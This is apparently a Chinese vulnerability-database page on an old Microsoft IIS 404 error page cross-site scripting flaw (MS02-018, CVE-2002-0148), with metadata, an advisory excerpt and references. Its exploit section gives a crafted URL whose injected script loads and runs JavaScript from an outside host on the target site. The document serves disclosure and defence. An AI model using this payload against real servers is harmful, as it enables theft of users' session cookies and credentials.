Microsoft IIS HTTP错误页面处理跨站脚本执行漏洞(MS02-018)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106665 漏洞类型 输入验证
发布时间 2002-04-10 更新时间 2005-05-02
CVE编号 CVE-2002-0148 CNNVD-ID CNNVD-200204-015
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21372
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200204-015
|漏洞详情
MicrosoftIIS(InternetInformationServer)是MSWindows系统默认自带的Web服务器软件。由于MicrosoftIIS建立的错误页面时没有很好的检查用户输入,可以导致攻击者进行跨站脚本执行攻击。每一次IIS碰到HTTP404代码,它就会显示"404notfound"的页面内容,这个HTML文件使用脚本输出一条到SERVER.TLD的连接,攻击者可以通过构建特殊的包含任意脚本代码命令的404页面连接,当其他用户浏览此连接的时候,包含在里面的脚本代码就会在浏览用户浏览器中执行。可能导致攻击者获得用户基于Cookie认证的敏感信息。
|漏洞EXP
source: http://www.securityfocus.com/bid/4486/info

A Cross Site Scripting issue exists in some versions of IIS. The HTTP Error Page created by IIS may, under some circumstances, contain HTML content which includes unsanitized user supplied input.

An attacker may construct a link to a vulnerable server such that it exploits this vulnerability. When an innocent user follows this link, the script code will be reproduced by the server, and execute within the context of the vulnerable site. This may result in the exposure of sensitive data and cookie information, or allow the attacker to subvert the content and functionality of the site.

It has been reported that this issue may be exploited to steal cookie-based authentication credentials from users of a number of Microsoft domains/services (such as hotmail, passport, etc.).

A number of Cisco products are affected by this vulnerability, although this issue is not present in the Cisco products themselves.

http://<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2fjscript.dk%5Cx2ftest.js%27;">script@YOUR.TLD/SomeNonExistantPath

The above will include and execute http://jscript.dk/test.js on YOUR.TLD, provided that YOUR.TLD is served by an IIS installation.
|参考资料

来源:US-CERTVulnerabilityNote:VU#886699
名称:VU#886699
链接:http://www.kb.cert.org/vuls/id/886699
来源:CERT/CCAdvisory:CA-2002-09
名称:CA-2002-09
链接:http://www.cert.org/advisories/CA-2002-09.html
来源:MS
名称:MS02-018
链接:http://www.microsoft.com/technet/security/bulletin/ms02-018.asp
来源:BID
名称:4486
链接:http://www.securityfocus.com/bid/4486
来源:OSVDB
名称:3339
链接:http://www.osvdb.org/3339
来源:XF
名称:iis-http-error-page-css(8803)
链接:http://www.iss.net/security_center/static/8803.php
来源:CISCO
名称:20020415MicrosoftIISVulnerabilitiesinCiscoProducts-MS02-018
链接:http://www.cisco.com/warp/public/707/Microsoft-IIS-vulnerabilities-MS02-018.shtml
来源:USGovernmentResource:oval:org.mitre.oval:def:92
名称:oval:org.mitre.oval:def:92
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:92
来源:USGovernmentResource:oval:org.mitre.oval:def:81
名称:oval:org.mitre.oval:def:81
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:81